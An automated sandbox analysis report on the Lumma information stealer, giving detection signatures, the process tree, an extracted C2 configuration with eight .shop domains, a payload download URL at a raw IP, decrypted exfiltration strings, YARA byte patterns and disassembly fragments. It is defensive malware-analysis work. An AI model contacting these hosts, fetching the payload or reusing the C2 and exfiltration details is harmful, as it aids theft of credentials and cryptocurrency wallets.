Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K27Yg4V48M.exe

Overview

General Information

Sample name:K27Yg4V48M.exe
renamed because original name is a hash value
Original sample name:c1fdbf911e07304172569387f99a2adf.exe
Analysis ID:1584360
MD5:c1fdbf911e07304172569387f99a2adf
SHA1:f9fa5e30e7f1ae0bcb16229fea74dc25f6fe8ff4
SHA256:40796079a899502d0afb6f82591909c3ce3c043a71616ecc906db42b9c4d2bfa
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • K27Yg4V48M.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\K27Yg4V48M.exe" MD5: C1FDBF911E07304172569387F99A2ADF)
    • 1831.tmp.exe (PID: 6556 cmdline: "C:\Users\user\AppData\Local\Temp\1831.tmp.exe" MD5: E7A39D1C95A0D6EDCDA94874D38987C2)
      • WerFault.exe (PID: 1088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 1884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["nearycrepso.shop", "rabidcowse.shop", "framekgirus.shop", "abruptyopsn.shop", "cloudewahsj.shop", "noisycuttej.shop", "tirepublicerj.shop", "wholersorie.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.4481462096.00000000020C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000002.00000002.2277951970.00000000020A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        Click to see the 5 entries
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:59:23.522302+010020283713Unknown Traffic192.168.2.549706104.21.112.1443TCP
        2025-01-05T08:59:24.467441+010020283713Unknown Traffic192.168.2.549707104.21.112.1443TCP
        2025-01-05T08:59:25.771541+010020283713Unknown Traffic192.168.2.549708104.21.112.1443TCP
        2025-01-05T08:59:27.378894+010020283713Unknown Traffic192.168.2.549709104.21.112.1443TCP
        2025-01-05T08:59:28.790526+010020283713Unknown Traffic192.168.2.549710104.21.112.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:59:23.982370+010020546531A Network Trojan was detected192.168.2.549706104.21.112.1443TCP
        2025-01-05T08:59:24.977044+010020546531A Network Trojan was detected192.168.2.549707104.21.112.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:59:23.982370+010020498361A Network Trojan was detected192.168.2.549706104.21.112.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:59:24.977044+010020498121A Network Trojan was detected192.168.2.549707104.21.112.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:59:23.522302+010020586071Domain Observed Used for C2 Detected192.168.2.549706104.21.112.1443TCP
        2025-01-05T08:59:24.467441+010020586071Domain Observed Used for C2 Detected192.168.2.549707104.21.112.1443TCP
        2025-01-05T08:59:25.771541+010020586071Domain Observed Used for C2 Detected192.168.2.549708104.21.112.1443TCP
        2025-01-05T08:59:27.378894+010020586071Domain Observed Used for C2 Detected192.168.2.549709104.21.112.1443TCP
        2025-01-05T08:59:28.790526+010020586071Domain Observed Used for C2 Detected192.168.2.549710104.21.112.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:59:23.033188+010020586061Domain Observed Used for C2 Detected192.168.2.5624221.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:59:28.098986+010020480941Malware Command and Control Activity Detected192.168.2.549709104.21.112.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-05T08:59:20.114170+010028032742Potentially Bad Traffic192.168.2.549704104.21.56.70443TCP
        2025-01-05T08:59:21.449770+010028032742Potentially Bad Traffic192.168.2.549705176.113.115.1980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: K27Yg4V48M.exeAvira: detected
        Source: https://cloudewahsj.shop:443/apiAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/qAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apizAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apie;Avira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apiAvira URL Cloud: Label: malware
        Source: http://176.113.115.19/ScreenUpdateSync.exe.Avira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE3Avira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/dAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/apioAvira URL Cloud: Label: malware
        Source: https://post-to-me.com/pAvira URL Cloud: Label: malware
        Source: https://cloudewahsj.shop/Avira URL Cloud: Label: malware
        Source: http://176.113.115.19/ScreenUpdateSync.exe;Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: 2.2.1831.tmp.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "rabidcowse.shop", "framekgirus.shop", "abruptyopsn.shop", "cloudewahsj.shop", "noisycuttej.shop", "tirepublicerj.shop", "wholersorie.shop"], "Build id": "4h5VfH--"}
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeReversingLabs: Detection: 52%
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeReversingLabs: Detection: 52%
        Source: K27Yg4V48M.exeReversingLabs: Detection: 50%
        Source: K27Yg4V48M.exeVirustotal: Detection: 43%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
        Source: K27Yg4V48M.exeJoe Sandbox ML: detected
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_00415D89 CryptUnprotectData,2_2_00415D89

        Compliance

        barindex
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeUnpacked PE file: 0.2.K27Yg4V48M.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeUnpacked PE file: 2.2.1831.tmp.exe.400000.0.unpack
        Source: K27Yg4V48M.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02138C59 FindFirstFileExW,0_2_02138C59
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]2_2_00441816
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov eax, esi2_2_0043D0D0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]2_2_0043D0D0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]2_2_0040C080
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00422370
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov word ptr [edx], cx2_2_00418BA2
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]2_2_00417054
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]2_2_0041B021
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0041B021
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_004438E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_004438F9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_004438FB
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]2_2_00422880
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebx, bx2_2_00427885
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_0041F170
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov dword ptr [ebp-2Ch], eax2_2_004421E9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [edi+10h], 00000000h2_2_004421E9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [esi]2_2_0041618C
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_0041BA52
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov esi, ecx2_2_0041BA52
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0041BA52
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh2_2_00402210
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0043A230
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]2_2_004442E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00431AF5
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]2_2_0040B280
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_00440A90
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]2_2_00441B50
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_00409360
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042FB7D
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]2_2_00408320
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_00419B30
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0041F3E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [esi], al2_2_0041B3F2
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0041AB90
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then jmp ecx2_2_00428C62
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, eax2_2_00427C10
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh2_2_00444C20
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]2_2_00414C30
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, eax2_2_00418492
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, word ptr [ebx]2_2_0043CD40
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042C5E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [esi], al2_2_0041B58F
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_004195B6
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_004195B6
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov edi, edx2_2_0043E6E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx eax, word ptr [edx]2_2_0043E6E0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, edx2_2_00430F4E
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, edx2_2_00430F54
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov word ptr [ebx], ax2_2_0041A770
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, edx2_2_00430F03
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042F716
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00407730
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407730
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]2_2_00427FC0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]2_2_00427FC0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_004437D0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]2_2_0042A7F0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov edx, ecx2_2_0042A7F0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, eax2_2_00427FFD
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov edx, ecx2_2_0042AF92
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042AF92
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov edx, ecx2_2_0042AFB0
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]2_2_020E5202
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov word ptr [edx], cx2_2_020E921E
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_020FB247
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, eax2_2_020F8264
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]2_2_020EB288
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_020EB288
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]2_2_020F829E
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]2_2_020E72BB
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]2_2_020DC2E7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov eax, esi2_2_0210D337
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]2_2_0210D337
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_020EF3D7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, edx2_2_0210116A
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, edx2_2_021011B5
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, edx2_2_021011BB
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_020EF647
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [esi], al2_2_020EB659
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]2_2_020F8677
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp al, 20h2_2_020D275E
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [esi], al2_2_020EB7F6
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh2_2_020D2477
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0210A497
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]2_2_020DB4E7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+18h]2_2_020E5527
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]2_2_02114547
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]2_2_020D8587
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_020D95C7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_020F25D7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov edi, edx2_2_0210EA3F
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]2_2_020F2AE7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ebx, bx2_2_020F7B02
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx eax, word ptr [edx]2_2_0210EB27
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_020E981D
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_020E981D
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_020FC847
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, eax2_2_020E886C
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_020FF97D
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_020D7997
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_020D7997
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov word ptr [ebx], ax2_2_020EA9D7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, eax2_2_020F7E77
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh2_2_02114E87
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then jmp ecx2_2_020F8EB2
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov edx, ecx2_2_020FAF50
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx edx, word ptr [ebx]2_2_0210CFA7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]2_2_020FAC89
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_020EBCB9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov esi, ecx2_2_020EBCB9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_020EBCB9
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_02110CF7
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_020FFDE4
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 4x nop then mov ecx, eax2_2_020EADF7

        Networking

        barindex
